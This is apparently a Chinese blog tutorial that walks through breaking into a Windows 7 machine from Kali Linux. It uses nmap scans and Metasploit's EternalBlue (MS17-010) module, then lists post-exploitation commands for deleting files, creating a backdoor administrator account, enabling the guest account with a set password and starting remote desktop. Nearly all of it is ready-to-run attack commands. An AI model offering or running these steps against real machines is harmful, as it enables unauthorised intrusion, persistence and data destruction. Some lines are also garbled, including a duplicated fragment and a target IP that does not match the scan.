kali入侵win7


title: kali入侵win7
tags: 教程
author: caijinbo
date: 2019-11-19

前提说明

1.在同个局域网内
2.准备纯净系统的win7系统电脑一台
3.准备kali系统一台
4.我的操作均是在虚拟机上完成,可能在物理机上效果会有所不同。

步骤

第一步: 扫描局域网内存活的主机:

nmap -sP 192.168.1.0/24 (扫描较快)
也可以直接用这条命令来扫描:
nmap -sS -sV -Pn 192.168.1.0/24 (扫描较慢)
nmap还有很多扫描用法,请自行查询。

第二步:扫描要攻击的主机:

nmap -sS -sV -Pn 192.168.1.111(例如目标主机是192.168.1.111)

第三步:Kali终端输入msfconsole 或者手动点击软件图标

第四步:先使用use auxiliary/scanner/smb/smb_ms17_010

利用ms17_010这个漏洞入侵
紧接着输入show options这个模块进行漏洞的分析,看看这个445端口是否能被入侵。

第五步:使用攻击模块:

use exploit/windows/smb/ms17_010_eternalblue

输入show targets查看这个模块适用于哪些系统的主机

第六步:设置RHOST,即要攻击的主机ip:

set RHOST 192.168.0.111

第七步:执行run

如果电脑存在上面的那个漏洞的话,这一步就可以进去了

第八步:执行想要操作的指令

删除文件夹:rmdir 目标文件夹
删除文件:del
创建文件夹:md 文件夹
查看目标的磁盘信息:wmic logicaldisk
查看系统信息:systeminfo
创建一个用户:net user test 123456 /add
将创建的test用户赋予管理员权限:net localgroup administrator test /add
查看有哪些用户:net user
查看账户的属性:net user test
立刻关机:shutdown /s/f
net user guest /active:yes 激活guest用户
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -n 查看端口的网络连接情况,常用netstat -an
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net user admin /active:no 将用户admin禁用
net user admin /active:yes 将用户admin激活
tive:no 将用户admin禁用
net user admin /active:yes 将用户admin激活
net start termservice termservice 是远程桌面服务

  • 12
    点赞
  • 88
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值